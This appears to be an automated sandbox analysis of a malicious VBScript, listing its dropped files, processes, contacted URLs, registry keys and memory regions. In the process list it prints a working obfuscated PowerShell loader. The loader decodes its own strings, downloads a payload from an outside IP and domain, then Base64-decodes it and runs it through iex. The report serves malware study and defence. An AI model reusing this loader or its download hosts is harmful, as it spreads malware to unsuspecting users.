Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Urgent_File_Confirmation_00000000000000000000.vbs
|
ASCII text, with very long lines (2211), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25dnuflu.ci0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lykckzwr.vzf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzvscs4r.jtf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z531fgvl.vw2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Paraphysiferous.Mak
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent_File_Confirmation_00000000000000000000.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33
Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets
Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish
byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded
ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate
Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For(
$Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower,
$Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61
' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M
fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0
3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui
sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate
= Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209
(Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa
l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209
(Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr
i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl
oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209
($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.]
=,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF
iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$
gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209
(Nordvest61 'B$Bg l,oFbAa.l :Ma nNi slu r i a,=A$Mt r u,e ') ;Diagonalgade209 $Packplane223;Diagonalgade209 (Nordvest61 '
SPt,aGrEtP- SSl e eTp. 4 ');Diagonalgade209 (Nordvest61 ' $Kg.l o b a,l : k lTa,p s.a lSv,e nN=g(,TBeAs tC-,PFa t hP E$EH
y.pBn o tuiFsSeArTe s )S ') ;Diagonalgade209 (Nordvest61 'S$ g,l,oLbFa lM:AS hLrDi m pci.shhS= $Cg,lTo,b a,l :,V v ePsSt,o
l.+C+.%A$Kb yTrUe n dTeRrVn,eAsA.Sc oLu,n,t ') ;$Ristornos33=$byrendernes[$Shrimpish];}$Tedeummers=367459;$Formningernes=26860;Diagonalgade209
(Nordvest61 ' $sg l oTbUaOlE:TDKiBsTp.aIt.cBhP = SGAeBt - C,oGn t e n,tF O$.HPy p n,o tIiMs eMr.eKsQ ');Diagonalgade209
(Nordvest61 'P$Dg.l o,bBaGl,:,P aPl,a.ettAiBoTl oNgKiBcRa,l R=E C[WSByUsFt e m . C o,nSv e,rMt,].:E: FVr o mBBKaTsReB6C4
S t r.i.n.gP(F$sDPi sTpBa tMcShS), ');Diagonalgade209 (Nordvest61 'L$.g lFo b a l :BT,o.n i cta,lK =K [,STyFs,t e m .STMe
x ta. E n.c,o dEi nVg.] :S: AAS.CGIII .EGPe t,S tTr.i,nPgF(B$KPPa lIa eLt i o lbo g i c a lc) ');Diagonalgade209 (Nordvest61
' $GgAlEoMbAaTl :SKOaLnCdBiSd tSw r.=c$MTDoUnSiUc a lS.,s,u,b sHt.r iTn gO(S$,TEe dDeRuNm mSePr.sS, $.FAo,rAmanLi nFgVeAr
n,eUsG) ');Diagonalgade209 $Kandidtwr;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33
Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets
Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish
byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded
ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate
Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For(
$Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower,
$Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61
' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M
fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0
3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui
sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate
= Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209
(Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa
l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209
(Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr
i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl
oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209
($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.]
=,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF
iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$
gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209
(Nordvest61 'B$Bg l,oFbAa.l :Ma nNi slu r i a,=A$Mt r u,e ') ;Diagonalgade209 $Packplane223;Diagonalgade209 (Nordvest61 '
SPt,aGrEtP- SSl e eTp. 4 ');Diagonalgade209 (Nordvest61 ' $Kg.l o b a,l : k lTa,p s.a lSv,e nN=g(,TBeAs tC-,PFa t hP E$EH
y.pBn o tuiFsSeArTe s )S ') ;Diagonalgade209 (Nordvest61 'S$ g,l,oLbFa lM:AS hLrDi m pci.shhS= $Cg,lTo,b a,l :,V v ePsSt,o
l.+C+.%A$Kb yTrUe n dTeRrVn,eAsA.Sc oLu,n,t ') ;$Ristornos33=$byrendernes[$Shrimpish];}$Tedeummers=367459;$Formningernes=26860;Diagonalgade209
(Nordvest61 ' $sg l oTbUaOlE:TDKiBsTp.aIt.cBhP = SGAeBt - C,oGn t e n,tF O$.HPy p n,o tIiMs eMr.eKsQ ');Diagonalgade209
(Nordvest61 'P$Dg.l o,bBaGl,:,P aPl,a.ettAiBoTl oNgKiBcRa,l R=E C[WSByUsFt e m . C o,nSv e,rMt,].:E: FVr o mBBKaTsReB6C4
S t r.i.n.gP(F$sDPi sTpBa tMcShS), ');Diagonalgade209 (Nordvest61 'L$.g lFo b a l :BT,o.n i cta,lK =K [,STyFs,t e m .STMe
x ta. E n.c,o dEi nVg.] :S: AAS.CGIII .EGPe t,S tTr.i,nPgF(B$KPPa lIa eLt i o lbo g i c a lc) ');Diagonalgade209 (Nordvest61
' $GgAlEoMbAaTl :SKOaLnCdBiSd tSw r.=c$MTDoUnSiUc a lS.,s,u,b sHt.r iTn gO(S$,TEe dDeRuNm mSePr.sS, $.FAo,rAmanLi nFgVeAr
n,eUsG) ');Diagonalgade209 $Kandidtwr;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paraphysiferous.Mak && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paraphysiferous.Mak && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://103.195.237.43/Magnetis
|
unknown
|
||
|
http://103.19
|
unknown
|
||
|
https://milanaces.com/Magnetiseringerne.sea0
|
unknown
|
||
|
http://103.195.237.43/Magnetiseringern
|
unknown
|
||
|
http://103.195.
|
unknown
|
||
|
http://103.195.237.43/Magnetiseringerne.s
|
unknown
|
||
|
https://milanaces.c
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://milanaces.co
|
unknown
|
||
|
http://103.195.237.43/Magnetiseringerne.sea
|
103.195.237.43
|
||
|
https://milanaces.com/Magnetiseringerne.sea
|
unknown
|
||
|
http://103.195.237.43/Magnetiseringerne.se
|
unknown
|
||
|
http://103.195.237.4
|
unknown
|
||
|
http://103.195H
|
unknown
|
||
|
http://103.195.237.43/Magnetiserin
|
unknown
|
||
|
https://milanaces.com/Magnetiseringern
|
unknown
|
||
|
http://103.195.237.43/Magnetiseri
|
unknown
|
||
|
https://milanaces.com
|
unknown
|
||
|
https://milanaces.com/Magneti
|
unknown
|
||
|
http://103.1
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://103.195
|
unknown
|
||
|
https://milanaces.com/Magnetiseringe
|
unknown
|
||
|
http://103.195.237.
|
unknown
|
||
|
https://milanaces.com/Magnet
|
unknown
|
||
|
https://milanaces.com/Magnetiseringer
|
unknown
|
||
|
http://103.195.237.43
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://103.195.237.43/Magneti
|
unknown
|
||
|
http://103.195.237.43/Magn
|
unknown
|
||
|
http://103.195.237.43/Magnet
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://103.195.237.43/Magnetiseringer
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://milanaces.com/Ma
|
unknown
|
||
|
https://milanaces.com/Magnetis
|
unknown
|
||
|
http://103.195.237
|
unknown
|
||
|
https://milanaces.com/Magnetiseringerne.
|
unknown
|
||
|
https://milanaces.com/Mag
|
unknown
|
||
|
https://milanaces.com/Magnetiseringerne.se
|
unknown
|
||
|
http://103.195.237.43/Mag
|
unknown
|
||
|
http://103.195.237.43/M
|
unknown
|
||
|
http://103.195.237.43/Magne
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://103.195.237.43/Magnetiseringerne.
|
unknown
|
||
|
http://103.195.23
|
unknown
|
||
|
https://milanaces.com/Magnetise
|
unknown
|
||
|
https://milanaces.com/Magnetiseringerne
|
unknown
|
||
|
https://milanaces.com/Magnetiseringerne.s
|
unknown
|
||
|
https://milanaces.com/Magnetiser
|
unknown
|
||
|
http://103.195.237.43/Ma
|
unknown
|
||
|
https://milanaces.com/
|
unknown
|
||
|
https://milanaces.com/Magne
|
unknown
|
||
|
https://milanaces.com/Magnetiserin
|
unknown
|
||
|
https://aka.ms/pscore6lBdq
|
unknown
|
||
|
http://103.195.237.43/Magnetisering
|
unknown
|
||
|
http://103.195.2
|
unknown
|
||
|
https://milanaces.com/M
|
unknown
|
||
|
http://103.195.237.43/
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://milanaces.com/Magn
|
unknown
|
||
|
http://103.195.237.43/Magnetiser
|
unknown
|
||
|
http://103.195.237.43/Magnetise
|
unknown
|
||
|
http://103.195.237.43/Magnetiseringerne
|
unknown
|
||
|
http://103.195.237.43/Magnetiseringe
|
unknown
|
||
|
https://milanaces.com/Magnetiseri
|
unknown
|
||
|
https://milanaces.com/Magnetisering
|
unknown
|
||
|
https://milanaces.com/Magnetiseringerne.seaX
|
unknown
|
There are 62 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.195.237.43
|
unknown
|
Viet Nam
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
9B15000
|
direct allocation
|
page execute and read and write
|
|
|
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
190BA0BF000
|
heap
|
page read and write
|
||
|
ADF06FE000
|
stack
|
page read and write
|
||
|
259D000
|
stack
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
21E80083000
|
trusted library allocation
|
page read and write
|
||
|
763E000
|
stack
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
|
7075000
|
heap
|
page read and write
|
||
|
190BA0A5000
|
heap
|
page read and write
|
||
|
499E000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
190BA0F7000
|
heap
|
page read and write
|
||
|
8ABB2FB000
|
stack
|
page read and write
|
||
|
190BA0D4000
|
heap
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
|
E6E92FF000
|
stack
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7410000
|
heap
|
page read and write
|
||
|
856D000
|
heap
|
page read and write
|
||
|
7429000
|
heap
|
page read and write
|
||
|
8380000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
21EF2477000
|
heap
|
page execute and read and write
|
||
|
190B9F64000
|
heap
|
page read and write
|
||
|
190BA0A5000
|
heap
|
page read and write
|
||
|
2F3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
853B000
|
heap
|
page read and write
|
||
|
21EF05D0000
|
heap
|
page read and write
|
||
|
190B81F3000
|
heap
|
page read and write
|
||
|
75FE000
|
stack
|
page read and write
|
||
|
7080000
|
heap
|
page read and write
|
||
|
190BA138000
|
heap
|
page read and write
|
||
|
190BA0D4000
|
heap
|
page read and write
|
||
|
21E8080C000
|
trusted library allocation
|
page read and write
|
||
|
190BA1B1000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
21E90001000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
190B8358000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
190BA0BF000
|
heap
|
page read and write
|
||
|
850A000
|
heap
|
page read and write
|
||
|
190BA087000
|
heap
|
page read and write
|
||
|
190B81BF000
|
heap
|
page read and write
|
||
|
8280000
|
trusted library allocation
|
page execute and read and write
|
||
|
190B9F80000
|
heap
|
page read and write
|
||
|
8FA0000
|
direct allocation
|
page execute and read and write
|
||
|
190BA1DD000
|
heap
|
page read and write
|
||
|
21E818AF000
|
trusted library allocation
|
page read and write
|
||
|
190BA1D7000
|
heap
|
page read and write
|
||
|
2A5E000
|
stack
|
page read and write
|
||
|
ADF01FD000
|
stack
|
page read and write
|
||
|
21EF2690000
|
heap
|
page read and write
|
||
|
21EF066F000
|
heap
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
21EF1EE0000
|
heap
|
page readonly
|
||
|
190B81F2000
|
heap
|
page read and write
|
||
|
8ABAFFF000
|
stack
|
page read and write
|
||
|
190BA1DC000
|
heap
|
page read and write
|
||
|
190BA08B000
|
heap
|
page read and write
|
||
|
75B8000
|
trusted library allocation
|
page read and write
|
||
|
190BA264000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
822D000
|
stack
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page read and write
|
||
|
B915000
|
direct allocation
|
page execute and read and write
|
||
|
190B9F61000
|
heap
|
page read and write
|
||
|
21EF05C5000
|
heap
|
page read and write
|
||
|
21EF066D000
|
heap
|
page read and write
|
||
|
190B821F000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
190BA20A000
|
heap
|
page read and write
|
||
|
7DF3FFB90000
|
trusted library allocation
|
page execute and read and write
|
||
|
21EF06B1000
|
heap
|
page read and write
|
||
|
8187000
|
stack
|
page read and write
|
||
|
21EF2781000
|
heap
|
page read and write
|
||
|
8325000
|
trusted library allocation
|
page read and write
|
||
|
7090000
|
heap
|
page read and write
|
||
|
190B81CD000
|
heap
|
page read and write
|
||
|
190B81E5000
|
heap
|
page read and write
|
||
|
21E8127F000
|
trusted library allocation
|
page read and write
|
||
|
190BA0D4000
|
heap
|
page read and write
|
||
|
190B8358000
|
heap
|
page read and write
|
||
|
21EF2670000
|
heap
|
page read and write
|
||
|
190B8213000
|
heap
|
page read and write
|
||
|
7488000
|
heap
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
190B822B000
|
heap
|
page read and write
|
||
|
190B8100000
|
heap
|
page read and write
|
||
|
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
|
190BA20B000
|
heap
|
page read and write
|
||
|
190BA071000
|
heap
|
page read and write
|
||
|
8710000
|
trusted library allocation
|
page read and write
|
||
|
190BA22F000
|
heap
|
page read and write
|
||
|
21EF1EF0000
|
trusted library allocation
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
2335C230000
|
heap
|
page read and write
|
||
|
190B81BD000
|
heap
|
page read and write
|
||
|
190B9F87000
|
heap
|
page read and write
|
||
|
8ABACFF000
|
stack
|
page read and write
|
||
|
190B8130000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
8ABA6F9000
|
stack
|
page read and write
|
||
|
190BA0DA000
|
heap
|
page read and write
|
||
|
6D9F000
|
stack
|
page read and write
|
||
|
190B8213000
|
heap
|
page read and write
|
||
|
2F00000
|
trusted library allocation
|
page read and write
|
||
|
8370000
|
trusted library allocation
|
page execute and read and write
|
||
|
190BA0C6000
|
heap
|
page read and write
|
||
|
ADF037E000
|
stack
|
page read and write
|
||
|
21EF0683000
|
heap
|
page read and write
|
||
|
21EF27A7000
|
heap
|
page read and write
|
||
|
190B81D5000
|
heap
|
page read and write
|
||
|
190B835C000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
190B820E000
|
heap
|
page read and write
|
||
|
4B75000
|
trusted library allocation
|
page read and write
|
||
|
8ABA8FE000
|
stack
|
page read and write
|
||
|
2E9F000
|
heap
|
page read and write
|
||
|
21E902EF000
|
trusted library allocation
|
page read and write
|
||
|
190B81CA000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
ADF067E000
|
stack
|
page read and write
|
||
|
190B8157000
|
heap
|
page read and write
|
||
|
826F000
|
stack
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
190BA0F7000
|
heap
|
page read and write
|
||
|
190BA0D4000
|
heap
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
21EF0610000
|
trusted library allocation
|
page read and write
|
||
|
190B9F89000
|
heap
|
page read and write
|
||
|
8ABB0FF000
|
stack
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
190B9F60000
|
heap
|
page read and write
|
||
|
190B9FA6000
|
heap
|
page read and write
|
||
|
21EF24D3000
|
heap
|
page read and write
|
||
|
7F2F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
190BA1C5000
|
heap
|
page read and write
|
||
|
190B9F67000
|
heap
|
page read and write
|
||
|
190B81BF000
|
heap
|
page read and write
|
||
|
21EF1FEA000
|
heap
|
page read and write
|
||
|
190B9F72000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
2900000
|
heap
|
page read and write
|
||
|
190B9F61000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
E6E90FD000
|
stack
|
page read and write
|
||
|
190B9FA5000
|
heap
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
190B81FC000
|
heap
|
page read and write
|
||
|
847B000
|
stack
|
page read and write
|
||
|
AF15000
|
direct allocation
|
page execute and read and write
|
||
|
190B80D0000
|
heap
|
page read and write
|
||
|
21E81DDD000
|
trusted library allocation
|
page read and write
|
||
|
4790000
|
heap
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
190B8355000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page readonly
|
||
|
ADF07FC000
|
stack
|
page read and write
|
||
|
190B821C000
|
heap
|
page read and write
|
||
|
9115000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
|
190BA0DA000
|
heap
|
page read and write
|
||
|
190BA1DE000
|
heap
|
page read and write
|
||
|
190B81E5000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page read and write
|
||
|
190B9F6F000
|
heap
|
page read and write
|
||
|
190BA266000
|
heap
|
page read and write
|
||
|
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
|
190BA08B000
|
heap
|
page read and write
|
||
|
852F000
|
heap
|
page read and write
|
||
|
190B815E000
|
heap
|
page read and write
|
||
|
767E000
|
stack
|
page read and write
|
||
|
190BA0DA000
|
heap
|
page read and write
|
||
|
2F40000
|
trusted library allocation
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
757D000
|
trusted library allocation
|
page read and write
|
||
|
8190000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
190BA1B3000
|
heap
|
